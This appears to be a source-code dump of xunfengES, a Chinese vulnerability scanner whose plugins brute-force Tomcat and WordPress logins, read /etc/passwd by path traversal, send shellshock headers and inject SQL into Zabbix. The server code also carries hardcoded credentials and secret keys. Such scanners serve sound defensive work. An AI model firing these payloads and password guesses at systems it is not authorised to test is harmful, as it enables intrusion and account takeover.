                headers = "Content-length: 0\n"
                fp = StringIO("")
            else:
                # Download into an anonymous temp file, then rewind it for the caller.
                fp = self.createTempFile()
                file_attrs, retrlen = conn.retrieveFile(service, path, fp)
                fp.seek(0)

                headers = ""
                mtype = mimetypes.guess_type(req.get_full_url())[0]
                if mtype:
                    headers += "Content-type: %s\n" % mtype
                if retrlen is not None and retrlen >= 0:
                    headers += "Content-length: %d\n" % retrlen

            sf = StringIO(headers)
            headers = mimetools.Message(sf)

            # NOTE(review): `conn` is never closed on either path; the SMB session
            # lives until the connection object is garbage-collected.
            return addinfourl(fp, headers, req.get_full_url())
        except Exception, ex:
            # Re-wrap as URLError (what urllib2 callers expect) while keeping the
            # original traceback via the three-argument raise. The message embeds
            # the pysmb error text, which may echo the share/path.
            raise urllib2.URLError, ('smb error: %s' % ex), sys.exc_info()[2]

    def createTempFile(self):
        """Return the file object downloads are spooled into (deleted on close)."""
        return tempfile.TemporaryFile()

    def generateClientMachineName(self):
        """Client NetBIOS name sent to the server: the short hostname, else 'SMB<pid>'."""
        hostname = socket.gethostname()
        if hostname:
            return hostname.split('.')[0]
        return 'SMB%d' % os.getpid()
SMB2_COM_FLUSH = 0x0007 18 | SMB2_COM_READ = 0x0008 19 | SMB2_COM_WRITE = 0x0009 20 | SMB2_COM_LOCK = 0x000A 21 | SMB2_COM_IOCTL = 0x000B 22 | SMB2_COM_CANCEL = 0x000C 23 | SMB2_COM_ECHO = 0x000D 24 | SMB2_COM_QUERY_DIRECTORY = 0x000E 25 | SMB2_COM_CHANGE_NOTIFY = 0x000F 26 | SMB2_COM_QUERY_INFO = 0x0010 27 | SMB2_COM_SET_INFO = 0x0011 28 | SMB2_COM_OPLOCK_BREAK = 0x0012 29 | 30 | SMB2_COMMAND_NAMES = { 31 | 0x0000: 'SMB2_COM_NEGOTIATE', 32 | 0x0001: 'SMB2_COM_SESSION_SETUP', 33 | 0x0002: 'SMB2_COM_LOGOFF', 34 | 0x0003: 'SMB2_COM_TREE_CONNECT', 35 | 0x0004: 'SMB2_COM_TREE_DISCONNECT', 36 | 0x0005: 'SMB2_COM_CREATE', 37 | 0x0006: 'SMB2_COM_CLOSE', 38 | 0x0007: 'SMB2_COM_FLUSH', 39 | 0x0008: 'SMB2_COM_READ', 40 | 0x0009: 'SMB2_COM_WRITE', 41 | 0x000A: 'SMB2_COM_LOCK', 42 | 0x000B: 'SMB2_COM_IOCTL', 43 | 0x000C: 'SMB2_COM_CANCEL', 44 | 0x000D: 'SMB2_COM_ECHO', 45 | 0x000E: 'SMB2_COM_QUERY_DIRECTORY', 46 | 0x000F: 'SMB2_COM_CHANGE_NOTIFY', 47 | 0x0010: 'SMB2_COM_QUERY_INFO', 48 | 0x0011: 'SMB2_COM_SET_INFO', 49 | 0x0012: 'SMB2_COM_OPLOCK_BREAK', 50 | } 51 | 52 | # Values for dialect_revision field in SMB2NegotiateResponse class 53 | SMB2_DIALECT_2 = 0x0202 54 | SMB2_DIALECT_21 = 0x0210 55 | SMB2_DIALECT_2ALL = 0x02FF 56 | 57 | # Bit mask for SecurityMode field in SMB2NegotiateResponse class 58 | SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001 59 | SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002 60 | 61 | # Values for ShareType field in SMB2TreeConnectResponse class 62 | SMB2_SHARE_TYPE_DISK = 0x01 63 | SMB2_SHARE_TYPE_PIPE = 0x02 64 | SMB2_SHARE_TYPE_PRINTER = 0x03 65 | 66 | # Bitmask for Capabilities in SMB2TreeConnectResponse class 67 | SMB2_SHARE_CAP_DFS = 0x0008 68 | 69 | # Values for OpLockLevel field in SMB2CreateRequest class 70 | SMB2_OPLOCK_LEVEL_NONE = 0x00 71 | SMB2_OPLOCK_LEVEL_II = 0x01 72 | SMB2_OPLOCK_LEVEL_EXCLUSIVE = 0x08 73 | SMB2_OPLOCK_LEVEL_BATCH = 0x09 74 | SMB2_OPLOCK_LEVEL_LEASE = 0xFF 75 | 76 | # Values for FileAttributes field in SMB2CreateRequest class 77 | 
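def convertFILETIMEtoEpoch(t):
    """Convert a Windows FILETIME to a Unix epoch timestamp.

    FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC; Unix time counts
    seconds since 1970-01-01 UTC. 116444736000000000 is the number of ticks
    between the two epochs (11644473600 s * 10**7).

    :param t: FILETIME value as an integer.
    :returns: float seconds since the Unix epoch (negative for dates before 1970).
    """
    # Plain int literal: Python 2 promotes to long automatically and the old
    # ``L`` suffix is a syntax error on Python 3.
    return (t - 116444736000000000) / 10000000.0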
def check(ip, port, timeout):
    """Brute-force the Tomcat Manager web console with HTTP Basic authentication.

    For each candidate username and each entry of the shared ``PASSWORD_DIC``
    list (``{user}`` in an entry is replaced by the username), requests
    ``/manager/html`` with an ``Authorization: Basic`` header and looks for the
    manager page markers in the body.

    :param ip: target host.
    :param port: target port.
    :param timeout: per-request timeout in seconds.
    :returns: ``u'Tomcat弱口令 <user>:<password>'`` on the first accepted login;
        ``None`` when the manager path is absent (404), when every attempt is
        rejected (401/403), or after three network-level failures.

    Note: credentials are sent base64-encoded over plaintext HTTP, so the probe
    itself discloses every password it tries to anyone on the path, and repeated
    failures may lock accounts or raise alerts on the target.
    """
    login_url = 'http://' + ip + ":" + str(port) + '/manager/html'
    success_markers = ('/manager/html/reload', 'Tomcat Web Application Manager')
    candidate_users = ('admin', 'manager', 'tomcat', 'apache', 'root')
    network_errors = 0

    for user in candidate_users:
        for pass_ in PASSWORD_DIC:
            try:
                pass_ = str(pass_.replace('{user}', user))
                request = urllib2.Request(login_url)
                request.add_header('Authorization', 'Basic ' + base64.b64encode(user + ':' + pass_))
                response = urllib2.urlopen(request, timeout=timeout)
                status, body = response.code, response.read()
            except urllib2.HTTPError as http_err:
                # 401/403/404 etc. arrive here; the body is still needed below.
                status, body = http_err.code, http_err.read()
            except urllib2.URLError:
                # Connection-level failure; stop after three so a dead host does
                # not consume the whole password list.
                network_errors += 1
                if network_errors >= 3:
                    return
                continue

            status = int(status)
            if status == 404:
                # No manager application deployed: nothing to brute-force.
                return
            if status in (401, 403):
                continue
            if any(marker in body for marker in success_markers):
                return u'Tomcat弱口令 %s:%s' % (user, pass_)
"WebServer任意文件读取", 9 | "info": "web容器对请求处理不当,可能导致可以任意文件读取(例:GET ../../../../../etc/passwd)。", 10 | "level": "高危", 11 | "type": "任意文件读取", 12 | "author": "wolf@YSRC", 13 | "url": "https://www.secpulse.com/archives/4276.html", 14 | "keyword": "server:web", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(ip, port, timeout): 21 | try: 22 | socket.setdefaulttimeout(timeout) 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | s.connect((ip, int(port))) 25 | flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n" 26 | s.send(flag) 27 | data = s.recv(1024) 28 | s.close() 29 | if 'root:' in data and 'nobody:' in data: 30 | return u"web容器任意文件读取漏洞" 31 | except: 32 | pass 33 | -------------------------------------------------------------------------------- /celerynode/vuldb/web_shellshock.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import urllib2 3 | import re 4 | import urlparse 5 | import HTMLParser 6 | 7 | 8 | def get_plugin_info(): 9 | plugin_info = { 10 | "name": "shellshock破壳", 11 | "info": "攻击者可利用此漏洞改变或绕过环境限制,以执行任意的shell命令,最终完全控制目标系统", 12 | "level": "紧急", 13 | "type": "命令执行", 14 | "author": "wolf@YSRC", 15 | "url": "http://www.freebuf.com/articles/system/45390.html", 16 | "keyword": "server:web", 17 | "source": 1 18 | } 19 | return plugin_info 20 | 21 | 22 | def get_url(domain, timeout): 23 | url_list = [] 24 | res = urllib2.urlopen('http://' + domain, timeout=timeout) 25 | html = res.read() 26 | root_url = res.geturl() 27 | m = re.findall("]*?href=('|\")(.*?)\\1", html, re.I) 28 | if m: 29 | for url in m: 30 | ParseResult = urlparse.urlparse(url[1]) 31 | if ParseResult.netloc and ParseResult.scheme: 32 | if domain == ParseResult.hostname: 33 | url_list.append(HTMLParser.HTMLParser().unescape(url[1])) 34 | elif not ParseResult.netloc and not ParseResult.scheme: 35 | url_list.append(HTMLParser.HTMLParser().unescape(urlparse.urljoin(root_url, url[1]))) 36 | 
return list(set(url_list)) 37 | 38 | 39 | def check(ip, port, timeout): 40 | try: 41 | url_list = get_url(ip + ":" + str(port), timeout) 42 | except Exception, e: 43 | return 44 | try: 45 | flag_list = ['() { :; }; /bin/expr 32001611 - 100', '{() { _; } >_[$($())] { /bin/expr 32001611 - 100; }}'] 46 | i = 0 47 | for url in url_list: 48 | if '.cgi' in url: 49 | i += 1 50 | if i >= 4: return 51 | for flag in flag_list: 52 | header = {'cookie': flag, 'User-Agent': flag, 'Referrer': flag} 53 | try: 54 | request = urllib2.Request('http://' + url, headers=header) 55 | res_html = urllib2.urlopen(request).read() 56 | except urllib2.HTTPError, e: 57 | res_html = e.read() 58 | if "32001511" in res_html: 59 | return u'shellshock命令执行漏洞' 60 | except Exception, e: 61 | pass 62 | -------------------------------------------------------------------------------- /celerynode/vuldb/wordpress_crackpass.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import urllib2 3 | import re 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Wordpress弱口令", 9 | "info": "攻击者通过此漏洞进入后台,通过编辑功能可获取webshell,最终导致服务器被入侵控制。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "", 14 | "keyword": "tag:wordpress", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def get_user(url, timeout): 21 | user_list = [] 22 | for i in range(1, 8): 23 | try: 24 | getuser_url = 'http://' + url + "/?author=" + str(i) 25 | res = urllib2.urlopen(getuser_url, timeout=timeout) 26 | res_html = res.read() 27 | pattern = "/author\/(.*)\/feed" 28 | p = "(.*?)(\||-)" 29 | m = re.search(pattern, res_html) 30 | if m: 31 | user_list.append(m.group(1).strip()) 32 | else: 33 | m1 = re.search(p, res_html) 34 | if m1: 35 | user_list.append(m1.group(1).strip()) 36 | except Exception, e: 37 | if len(user_list): 38 | return user_list 39 | else: 40 | return ['admin'] 41 | if len(user_list): 42 | return user_list 43 | else: 44 | 
return ['admin'] 45 | 46 | 47 | def check(ip, port, timeout): 48 | url = ip + ":" + str(port) 49 | flag_list = ['<name>isAdmin</name>', '<name>url</name>'] 50 | user_list = get_user(url, timeout) 51 | error_i = 0 52 | for user_str in user_list: 53 | pass_list.append(user_str) 54 | try: 55 | if ':' in url: 56 | domain = url.split(':', 1)[0] 57 | else: 58 | domain = url 59 | domain_sp = domain.split('.') 60 | pass_list.append(domain) 61 | pass_list.append(domain_sp[0]) 62 | pass_list.append(domain_sp[len(domain_sp) - 2] + "." + domain_sp[len(domain_sp) - 1]) 63 | pass_list.append(domain_sp[len(domain_sp) - 2]) 64 | except: 65 | pass 66 | for pass_str in PASSWORD_DIC: 67 | try: 68 | login_path = '/xmlrpc.php' 69 | PostStr = "<?xml version='1.0' encoding='iso-8859-1'?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>%s</value></param> <param><value>%s</value></param> </params></methodCall>" % ( 70 | user_str, pass_str) 71 | request = urllib2.Request('http://' + url + login_path, PostStr) 72 | res = urllib2.urlopen(request, timeout=timeout) 73 | res_html = res.read() 74 | for flag in flag_list: 75 | if flag in res_html: 76 | return u'Wordpress后台弱口令,账号:%s 密码:%s' % (user_str, pass_str) 77 | except urllib2.URLError, e: 78 | error_i += 1 79 | if error_i >= 3: return 80 | except: 81 | return 82 | -------------------------------------------------------------------------------- /celerynode/vuldb/zabbix_jsrpc_SQL.json: -------------------------------------------------------------------------------- 1 | { 2 | "info": "攻击者通过此漏洞可获取管理员权限登陆后台,后台存在执行命令功能,导致服务器被入侵控制。", 3 | "source": 1, 4 | "name": "zabbix jsrpc SQL注入", 5 | "keyword": "tag:zabbix", 6 | "level": "高危", 7 | "url": "https://github.com/Medicean/VulApps/tree/master/z/zabbix/1", 8 | "author": "wolf@YSRC", 9 | "type": "SQL注入", 10 | "plugin": { 11 | "url": 
"/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x36),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17", 12 | "tag": "POC:/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1 or updatexml(1,md5(0x36),1) or 1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17", 13 | "analyzing": "keyword", 14 | "analyzingdata": "c5a880faf6fb5e6087eb1b2dc", 15 | "data": "", 16 | "method": "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /celerynode/vuldb/zabbix_latest_sql.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import re 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Zabbix latest SQL注入", 9 | "info": "攻击者通过此漏洞可获取管理员权限登陆后台,后台存在执行命令功能,导致服务器被入侵控制。", 10 | "level": "高危", 11 | "type": "SQL注入", 12 | "author": "wolf@YSRC", 13 | "url": "https://github.com/Medicean/VulApps/tree/master/z/zabbix/2", 14 | "keyword": "tag:zabbix", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(ip, port, timeout): 21 | try: 22 | url = "http://" + ip + ":" + str(port) 23 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 24 | request = opener.open(url + "/dashboard.php", timeout=timeout) 25 | res_html = request.read() 26 | except: 27 | return 28 | if 'href="slides.php?sid=' in res_html: 29 | m = re.search(r'href="slides\.php\?sid=(.+?)">', res_html, re.M | re.I) 30 | if m: 31 | sid = m.group(1) 32 | payload = "/latest.php?output=ajax&sid={sid}&favobj=toggle&toggle_open_state=1&toggle_ids[]=(select%20updatexml(1,concat(0x7e,(SELECT%20md5(666)),0x7e),1))".format( 33 | sid=sid) 34 | res_html = opener.open(url + payload, timeout=timeout).read() 35 | if 'fae0b27c451c728867a567e8c1bb4e5' in res_html: 36 | return 
u"存在SQL注入,POC:" + payload 37 | -------------------------------------------------------------------------------- /celerynode/vuldb/zookeeper_unauth_access.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "Zookeeper未授权访问", 8 | "info": "Zookeeper Unauthorized access", 9 | "level": "中危", 10 | "type": "未授权访问", 11 | "author": "c4bbage@qq.com", 12 | "url": "https://hackerone.com/reports/154369", 13 | "keyword": "server:Zookeeper", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | socket.setdefaulttimeout(timeout) 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | s.connect((ip, int(port))) 24 | flag = "envi" 25 | # envi 26 | # dump 27 | # reqs 28 | # ruok 29 | # stat 30 | s.send(flag) 31 | data = s.recv(1024) 32 | s.close() 33 | if 'Environment' in data: 34 | return u"Zookeeper Unauthorized access" 35 | except: 36 | pass 37 | 38 | 39 | def main(): 40 | ip = "1.1.1.1" 41 | print check(ip, 2181, 2) 42 | 43 | if __name__ == '__main__': 44 | main() 45 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "private": true, 3 | "entry": { 4 | "index": "./app/index.js" 5 | }, 6 | "dependencies": { 7 | "antd": "^2.1.0", 8 | "axios": "^0.16.2", 9 | "echarts": "^3.6.1", 10 | "echarts-for-react": "^1.2.0", 11 | "eslint-plugin-import": "^1.16.0", 12 | "react": "^15.5.0", 13 | "react-dom": "^15.5.0", 14 | "react-router": "^3.0.2", 15 | "react-slick": "^0.14.11", 16 | "recharts": "^0.22.3", 17 | "screenfull": "^3.2.0" 18 | }, 19 | "devDependencies": { 20 | "atool-build": "^0.9.0", 21 | "atool-test-mocha": "^0.1.4", 22 | "babel-eslint": "^7.0.0", 23 | "babel-plugin-import": "^1.0.1", 24 | "babel-plugin-transform-runtime": "^6.8.0", 25 | 
"babel-runtime": "^6.9.2", 26 | "dora": "0.4.x", 27 | "dora-plugin-webpack": "^0.8.1", 28 | "eslint": "^3.8.1", 29 | "eslint-config-airbnb": "^12.0.0", 30 | "eslint-plugin-import": "^2.0.1", 31 | "eslint-plugin-jsx-a11y": "^2.2.3", 32 | "eslint-plugin-react": "^6.4.1", 33 | "expect": "^1.20.1", 34 | "pre-commit": "1.x", 35 | "redbox-react": "^1.2.6" 36 | }, 37 | "pre-commit": [ 38 | "lint" 39 | ], 40 | "scripts": { 41 | "build": "atool-build", 42 | "lint": "eslint --ext .js,.jsx src/", 43 | "start": "dora --plugins webpack", 44 | "test": "atool-test-mocha ./**/__tests__/*-test.js" 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /server/Config.py: -------------------------------------------------------------------------------- 1 | #coding: utf8 2 | 3 | class ServerConfig(object): 4 | USERNAME = "test" 5 | PASSWORD = "test" 6 | 7 | class RedisConfig(object): 8 | HOST = "localhost" 9 | PORT = 6379 10 | PASSWORD = "" 11 | BR = 1 12 | HOSTSCANKEY = "hostScan" 13 | VULTASKKEY = "vulTask" 14 | 15 | class ElasticConfig(object): 16 | HOST = "localhost" 17 | PORT = "9200" 18 | USERNAME = "" 19 | PASSWORD = "" 20 | INDEX_CONFIG = {"index":"xfconfig", "type":"logs"} 21 | INDEX_ASSETS = {"index":"assets", "type":"logs"} 22 | INDEX_VULTASKS = {"index":"vulscan", "type":"data"} -------------------------------------------------------------------------------- /server/Index.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | from datetime import timedelta 4 | from flask import Flask 5 | from Config import ServerConfig 6 | 7 | app = Flask(__name__) 8 | app.secret_key = "\xe8\xf7\xb9\xae\xfb\x87\xea4<5\xe7\x97D\xf4\x88)Q\xbd\xe1j'\x83\x13\xc7" 9 | app.config.from_object(ServerConfig) 10 | app.debug=True 11 | 12 | app.permanent_session_lifetime = timedelta(hours=6) 13 | 14 | 15 | -------------------------------------------------------------------------------- 
/server/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/__init__.py
-------------------------------------------------------------------------------- /server/common.py: --------------------------------------------------------------------------------
1 | #coding:utf8
2 | import re
3 | 
4 | def checkip(ip):
    """Return True if `ip` is a dotted-quad IPv4 address, else False.

    Each octet must be in 0-255; IPv6, CIDR notation and ranges are rejected.
    `ip` must be a string (re.match raises on other types).
    """
5 |     p = re.compile('^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$')
6 |     if p.match(ip):
7 |         return True
8 |     else:
9 |         return False
10 | 
11 | def cleanPostData(data):
    """Normalise a newline-separated form field into a comma-separated string.

    Every space is removed first (including spaces inside an entry), then the
    text is split on newlines, empty entries are dropped and the remainder is
    joined with ",". Returns "" for empty input.
    """
12 |     data = data.replace(" ","") # remove spaces
13 |     data = data.split("\n") # remove newlines
14 |     while "" in data:
15 |         data.remove("")
16 |     return ",".join(data)
17 | 
18 | 
19 | 
-------------------------------------------------------------------------------- /server/esinit.py: --------------------------------------------------------------------------------
1 | #coding: utf8
2 | from Config import ElasticConfig
3 | from es import Es
4 | from vulscan import vulScan
5 | 
# One-shot bootstrap: seed the scan config and the vuln-plugin entries in ES.
6 | if __name__ == '__main__':
7 |     es = Es()
8 |     # initialize the periodic-scan config
9 |     es.init_scan_config()
10 |     # initialize the vultask scripts
11 |     vulScan.init()
12 |     print 'es初始化完成'
-------------------------------------------------------------------------------- /server/lib/Login.py: --------------------------------------------------------------------------------
1 | #coding: utf8
2 | from functools import wraps
# NOTE(review): `request` is not imported in this module although anticsrf
# (below) reads request.referrer and request.host; the resulting NameError is
# caught by its broad except and turned into a redirect to 'Error', so that
# decorator never admits a request. Add `request` to this import line.
3 | from flask import session,url_for, redirect,logging
4 | 
5 | # Login-state check
6 | def logincheck(f):
    """Decorator: call `f` only when session['login'] == 'loginsuccess'.

    Any other state redirects to the 'Login' endpoint; an exception raised
    while checking is printed and redirected to 'Error'. The entire login
    state is this single session value, so it is only as strong as the
    secrecy of the app's session-signing key.
    """
7 |     @wraps(f)
8 |     def wrapper(*args, **kwargs):
9 |         try:
10 |             if session.has_key('login'):  # Python 2 only; `'login' in session` is the portable form
11 |                 if session['login'] == 'loginsuccess':
12 |                     return f(*args, **kwargs)
13 |                 else:
14 |                     return redirect(url_for('Login'))
15 |             else:
16 |                 return redirect(url_for('Login'))
17 |         except Exception, e:
18 |             print e  # stdout only; the imported `logging` is never used in this file
19 |             return redirect(url_for('Error'))
20 | 
21 |     return wrapper
22 | 
23 | 
24 | # Check the referer
25 | def anticsrf(f):
26 | 
@wraps(f)
    # NOTE(review): `request` is never imported in this module (line 3 brings
    # in only session, url_for, redirect, logging), so the condition below
    # raises NameError on every call and the except redirects to 'Error'.
27 |     def wrapper(*args, **kwargs):
28 |         try:
            # Referer host must equal the Host header. Only the "http://"
            # prefix is stripped, so an https:// referer never matches, and a
            # request carrying no Referer is refused outright. A per-session
            # token would be the more robust CSRF defence than this check.
29 |             if request.referrer and request.referrer.replace('http://', '').split('/')[0] == request.host:
30 |                 return f(*args, **kwargs)
31 |             else:
32 |                 return redirect(url_for('NotFound'))
33 |         except Exception, e:
34 |             print e
35 |             return redirect(url_for('Error'))
36 | 
37 |     return wrapper
-------------------------------------------------------------------------------- /server/lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/lib/__init__.py
-------------------------------------------------------------------------------- /server/monitor/index.py: --------------------------------------------------------------------------------
1 | #coding:utf8
2 | import sys
3 | import os
4 | import time
5 | import thread
6 | 
7 | from verify import portCheck
8 | sys.path.append(os.path.split(os.path.realpath(__file__))[0]+"/../../")  # make `server` and `celerynode` importable from two levels up
9 | from server.es import Es
10 | from celerynode.api import api_hostScan
11 | 
# Scheduler loop: once a minute, fire api_hostScan when the configured
# day/hour matches. The port re-verification loop from verify.py runs in a
# side thread; its second argument ("test") is unused by portCheck.
12 | if __name__ == "__main__":
13 |     es = Es()
14 |     thread.start_new_thread(portCheck,(es, "test"))
15 |     try:
16 |         ac_data = []  # dates already scanned, so the matching hour triggers at most one scan per day
17 |         while True:
18 |             now_time = time.localtime()
19 |             now_hour = now_time.tm_hour
20 |             now_day = now_time.tm_mday
                # NOTE(review): no zero padding, so e.g. Jan 11 and Nov 1 both
                # yield "<year>111" and the later date is skipped as already
                # scanned. time.strftime('%Y%m%d', now_time) avoids the clash.
21 |             now_date = str(now_time.tm_year) + str(now_time.tm_mon) + str(now_day)
22 |             cy_day, ac_hour = es.get_scan_config()["scanPeriod"].split('|') # read the period config
                # "every N days" is approximated as day-of-month % N == 0, so
                # the interval restarts at every month boundary.
23 |             if now_hour == int(ac_hour) and now_day % int(cy_day) == 0 and now_date not in ac_data:
24 |                 ac_data.append(now_date)
25 |                 scanHosts = es.get_scan_config()["scanHosts"]
26 |                 scanPorts = es.get_scan_config()["scanPorts"]
27 |                 print (scanHosts, scanPorts)
28 |                 api_hostScan(hostsList=scanHosts, ports=scanPorts)
29 |             time.sleep(60)
30 |     except Exception, e:
31 |         print e  # any error ends the scheduler; the process keeps running only for the side thread
-------------------------------------------------------------------------------- /server/monitor/verify.py: 
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 | import time
4 | 
5 | sys.path.append(os.path.split(os.path.realpath(__file__))[0]+"/../../")  # make `server` and `celerynode` importable
6 | from server.Config import ElasticConfig  # not referenced anywhere in this file
7 | from celerynode.api import api_hostVerify
8 | 
9 | def portCheck(es, test):
    """Re-verify every stored host/port/queue record, forever.

    Each pass calls api_hostVerify(host, port, queue) for every hit returned
    by es.getAllData(), then sleeps 30 minutes (the sleep's placement inside
    the loop is inferred from the flattened listing). `test` is never used.
    Started from monitor/index.py via thread.start_new_thread; nothing here
    catches exceptions, so one failure from getAllData or api_hostVerify
    ends the loop.
    """
10 |     while True:
11 |         data = es.getAllData()
12 |         for item in data:
13 |             host = item["_source"]["host"]  # ES hit shape assumed: {"_source": {"host", "port", "queue"}}
14 |             port = item["_source"]["port"]
15 |             queue = item["_source"]["queue"]
16 |             api_hostVerify(host, port, queue)
17 |         time.sleep(1800)
-------------------------------------------------------------------------------- /server/redispool.py: --------------------------------------------------------------------------------
1 | import sys
2 | import os
3 | import redis
4 | from Config import RedisConfig
5 | 
6 | def getPoolBR():
    """Return a redis.Redis client backed by a ConnectionPool on db RedisConfig.BR.

    NOTE(review): on failure this returns the *string* 'None', not None, so a
    caller testing `is None` (or truthiness) treats the failure as a live
    client. Constructing a pool does not itself open a socket, so this except
    is unlikely to fire; connection errors surface on the first command.
    """
7 |     try:
8 |         poolBR = redis.ConnectionPool(host=RedisConfig.HOST, port=RedisConfig.PORT, password=RedisConfig.PASSWORD, db=RedisConfig.BR)
9 |         return redis.Redis(connection_pool=poolBR)
10 |     except Exception as e:
11 |         print 'redis connect error'
12 |         return 'None'
13 | 
14 | def getStrictRedis():
    """Return a redis.StrictRedis client on db RedisConfig.BR.

    Same failure contract as getPoolBR: the string 'None' on exception.
    """
15 |     try:
16 |         r = redis.StrictRedis(host=RedisConfig.HOST, port=RedisConfig.PORT, password=RedisConfig.PASSWORD, db=RedisConfig.BR)
17 |         return r
18 |     except Exception as e:
19 |         print 'redis connect error'
20 |         return 'None'
21 | 
-------------------------------------------------------------------------------- /server/run.py: --------------------------------------------------------------------------------
1 | from Routes import app
2 | 
3 | if __name__ == '__main__':
4 |     # app.debug = True
    # NOTE(review): binds every interface on port 80 with no TLS. Index.py in
    # this repo sets app.debug=True unconditionally; if Routes re-exports that
    # app, the commented-out line above does not turn debug mode off here.
5 |     app.run(threaded=True, port=80,host='0.0.0.0')
6 | 
-------------------------------------------------------------------------------- /server/static/fonts/glyphicons-halflings-regular.eot: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/static/fonts/glyphicons-halflings-regular.eot -------------------------------------------------------------------------------- /server/static/fonts/glyphicons-halflings-regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/static/fonts/glyphicons-halflings-regular.ttf -------------------------------------------------------------------------------- /server/static/fonts/glyphicons-halflings-regular.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/static/fonts/glyphicons-halflings-regular.woff -------------------------------------------------------------------------------- /server/static/images/wind.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/server/static/images/wind.jpeg -------------------------------------------------------------------------------- /server/static/js/common.js: -------------------------------------------------------------------------------- 1 | !function(e){function t(n){if(r[n])return r[n].exports;var a=r[n]={exports:{},id:n,loaded:!1};return e[n].call(a.exports,a,a.exports,t),a.loaded=!0,a.exports}var n=window.webpackJsonp;window.webpackJsonp=function(c,o){for(var i,p,s=0,l=[];s<c.length;s++)p=c[s],a[p]&&l.push.apply(l,a[p]),a[p]=0;for(i in o){var u=o[i];switch(typeof u){case"object":e[i]=function(t){var n=t.slice(1),r=t[0];return function(t,a,c){e[r].apply(this,[t,a,c].concat(n))}}(u);break;case"function":e[i]=u;break;default:e[i]=e[u]}}for(n&&n(c,o);l.length;)l.shift().call(null,t);if(o[0])return r[0]=0,t(0)};var 
r={},a={0:0};t.e=function(e,n){if(0===a[e])return n.call(null,t);if(void 0!==a[e])a[e].push(n);else{a[e]=[n];var r=document.getElementsByTagName("head")[0],c=document.createElement("script");c.type="text/javascript",c.charset="utf-8",c.async=!0,c.src=t.p+""+({1:"index"}[e]||e)+".js",r.appendChild(c)}},t.m=e,t.c=r,t.p=""}(function(e){for(var t in e)if(Object.prototype.hasOwnProperty.call(e,t))switch(typeof e[t]){case"function":break;case"object":e[t]=function(t){var n=t.slice(1),r=e[t[0]];return function(e,t,a){r.apply(this,[e,t,a].concat(n))}}(e[t]);break;default:e[t]=e[e[t]]}return e}([])); -------------------------------------------------------------------------------- /server/templates/error.html: -------------------------------------------------------------------------------- 1 | 别搞我 -------------------------------------------------------------------------------- /server/templates/index.html: -------------------------------------------------------------------------------- 1 | <!DOCTYPE html> 2 | <html lang="en"> 3 | <head> 4 | <meta charset="UTF-8"> 5 | <title>巡风ES 6 | 7 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /server/templates/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 巡风 For ES 4 | 5 | 11 | 12 |
